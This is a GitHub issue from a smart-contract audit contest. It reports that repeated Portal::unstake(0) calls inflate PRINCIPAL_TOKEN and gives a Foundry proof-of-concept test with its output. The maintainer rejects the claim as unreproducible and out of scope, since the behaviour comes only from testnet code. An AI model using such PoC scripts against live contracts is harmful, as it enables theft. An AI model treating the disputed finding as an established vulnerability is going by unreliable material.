search

hats-finance / Possum-Labs--Portals--0xed8965d49b8aeca763447d56e6da7f4e0506b2d3

GNU General Public License v2.0
0 stars 2 forks source link

`Portal::unstake()` can inflate the Portal with PRINCIPAL_TOKEN #80

Open hats-bug-reporter[bot] opened 1 year ago

hats-bug-reporter[bot] commented 1 year ago

Github username: -- Twitter username: -- Submission hash (on-chain): 0x157ad3349496dd1de4798258ad36cbc124ebec5fd47b3993dea6da30cc834365 Severity: high

Description: Description\ Portal::unstake() can inflate the Portal with PRINCIPAL_TOKEN

Attack Scenario\ User stakes some amount of HLP tokens via Portal::stake() and then unstakes with Portal::unstake() passing 0 as amount arg.

This leads to minting 10% of staked HLP amount to be minted on portal address in PRINCIPAL_TOKEN.

Attacker could call this multiple times leading to massive circurlation increase in PRINCIPAL_TOKEN.

Attachments

Proof of Concept (PoC) File

    function test_inflatePrincipalToken() public {
               vm.startPrank(alice);
                hlp.approve(address(p), 100_000 ether);
                p.stake(100_000 ether);

                uint256 beforePortalBalance = usdc.balanceOf(address(p));
                for (uint256 i = 0; i < 50; i++) {
                    p.unstake(0);
                }
                uint256 newPortalBalance = usdc.balanceOf(address(p));

                console.log(
                    "Portal USDC balance after invalid unstake: ",
                    newPortalBalance - beforePortalBalance
            );
Running 1 test for test/PoC.t.sol:PortalTest
[PASS] test_inflatePrincipalToken() (gas: 1517792)
Logs:
  Portal USDC balance after invalid unstake:  5000000000000000000000

Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 2.34s

Ran 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)

Files:

PossumLabsCrypto commented 1 year ago

Couldn´t reproduce, hence invalid.

There is no logic in unstake() that takes 10% of anything. Also there is no minting of HLP because we don´t control that token. Looks like a fake report until proven otherwise.

spaceh3ad commented 12 months ago

Here you can see onchain tx:

  1. stake - https://sepolia.etherscan.io/tx/0x8d98b7053bce44dff7a5c180b15dda0ed347bb8d8c7844cf4f3e5f2167b830b3
  2. unstake - https://sepolia.etherscan.io/tx/0x61d0b4b5227b8511ba03d374ea56ce77470fb86e9814d1c4f076c3a5b45aabef
PossumLabsCrypto commented 11 months ago

The testnet Portal has different logic because of the lack of a functioning HMX system to produce yield on Sepolia. However, the testnet code is out of scope.

Please make sure that your analysis and bug reports are related to the in-scope code in future competitions, thank you.